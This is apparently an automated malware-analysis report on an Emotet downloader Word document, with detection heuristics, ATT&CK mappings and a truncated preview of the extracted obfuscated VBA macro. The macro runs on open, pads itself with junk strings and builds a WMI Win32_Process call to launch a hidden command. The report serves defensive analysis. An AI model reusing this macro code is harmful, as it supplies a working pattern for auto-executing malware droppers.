Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-10001946-0', indicating it is a downloader for the Emotet family. High-severity heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that uses CreateObject, a common technique for executing malicious code. The AutoOpen macro is obfuscated, but its presence together with the CreateObject call strongly suggests it is designed to download and execute a secondary payload.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-10001946-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected [medium, OLE_VBA_MACROS; 3 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5465 bytes |

SHA-256 of macros.bas: 8917f592740c5a97fa32c73bf42bcf25a1979d28e96f9ab1addff82a6f05a24b
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "ZizB7C0, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "opNcpX7, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "jTwZf7i, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
Debug.Print "J23uq3Xf" + ("KN8umcO") + "T21Mjc2" + "owNi0nG" + "KKtjm4" + ("pD1zsm" + ("mBVoTS"))
Debug.Print "lsNHoPU" + ("SBPzzO9O") + "pZzELvQ" + "n0w6WG1" + ("rriuN1Wl" + "wzYZFnB")
XljlAI
Debug.Print "C66c1os7" + ("r1jwDDp") + "dD1L7G" + "SVSjLvXz" + "Jnp1F4X" + ("mB5ZbES" + ("Lu_VmtWl"))
Debug.Print "iEL_BsdT" + ("w8w0di5c") + "Z4zdmSW2" + "YfrfRjjC" + ("wvsO8Q7B" + "q6pVYz")
End Sub
Attribute VB_Name = "iQIiph_d"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "IViVi4R"
Attribute VB_Name = "EYvKQi"
Attribute VB_Name = "j975iQsh"
Attribute VB_Name = "BXVHH6ES"
Attribute VB_Name = "BX0q4jEU"
Attribute VB_Name = "ivMlb9Gw"
Attribute VB_Name = "AAYKOrKz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "CUD4ZfK3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "okiKDdw6"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "juYiPB"
Function XljlAI()
C9dAoV0 = ThisDocument.opNcpX7 + ThisDocument.jTwZf7i + ThisDocument.ZizB7C0
Debug.Print "sm_mmNp6" + ("fJlAT6K") + "k2lqhfqJ" + "FmL090" + "fl1iRVKV" + ("HrQ2CpY4" + ("XH8EjwY0"))
Debug.Print "hCmPjh" + ("iQjLL3") + "tPkjkEt" + "Zov_f8" + ("HKHFASjs" + "AaR7EF")
tb5jnov = "win"
Debug.Print "LzmfGj" + ("RijjOiF") + "ttaSSj" + "vqLcAi" + "wV1Lu3t" + ("ltKmzYSJ" + ("Y6z7Nl"))
Debug.Print "rIFV77" + ("HQ4VAA") + "d22nIR" + "NZIiIZ" + ("Yq5L5Yz" + "YPCQYJd")
CjP2GbIX = tb5jnov + "mgmts:Win" + "32_Process"
Debug.Print "dafZvM" + ("ojsZcB") + "wS4wJCVh" + "RbT1l3" + "OL1iXG9U" + ("o0jfEk7w" + ("AhE08r3"))
Debug.Print "w72fwui7" + ("o1zwjvdh") + "m6zkYpv" + "fqPHfU38" + ("nhof1jqM" + "LdJBdEB")
w3kN3tLj(CjP2GbIX).Create# C9dAoV0, G_aEzP, fSpQdQS, Qcrz_zE1
Debug.Print "VFulswPp" + ("Absnd_") + "OJA2p50J" + "tLq5c3" + "hDRBLB" + ("DcbTpn" + ("XXtib2n"))
Debug.Print "wz0kG026" + ("vjQ00Tl") + "ljmP_Kc" + "IqwbuG" + ("di9ilY" + "O_MYuP")
End Function
Attribute VB_Name = "rXWh_a"
Function fSpQdQS()
Debug.Print "JT13vJ4" + ("CJCkcOhr") + "wNFYZFoP" + "oHTz5Zk" + "zqVlr9Wr" + ("YqWYYRL" + ("VzG5q6I7"))
Debug.Print "jDpt9M" + ("jYbCYGm") + "Vu6htSpY" + "opriCjd3" + ("zZLKpjti" + "AR9CtL7")
tb5jnov = zUATc971 + "win" + vOC56Bj
Debug.Print "bsELGG" + ("aIOZ9Fp") + "wcvaW3j" + "XC_3F8" + "OdvGVTt" + ("tTiLPiF7" + ("OwL1jS"))
Debug.Print "KnoCSPV" + ("MPnJBv") + "NVJNi67b" + "sGoOwjpj" + ("rBS1bX" + "BFQAl2Q9")
CjP2GbIX = tb5jnov + "mgmts:Win" + ltmkYiri + "32_Process" + "Startup"
Debug.Print "iJSsaD" + ("G8CRR0dC") + "UH78liM" + "AiHuiEuq" + "C2EuOz" + ("QWju68C" + ("HoiujuJ"))
Debug.Print "AMiNhS" + ("ptTXrKM7") + "UQjLsv" + "BPjjH7w" + ("KIHzNFLI" + "NdiVzpZ")
Set fSpQdQS = w3kN3tL
... (truncated)
```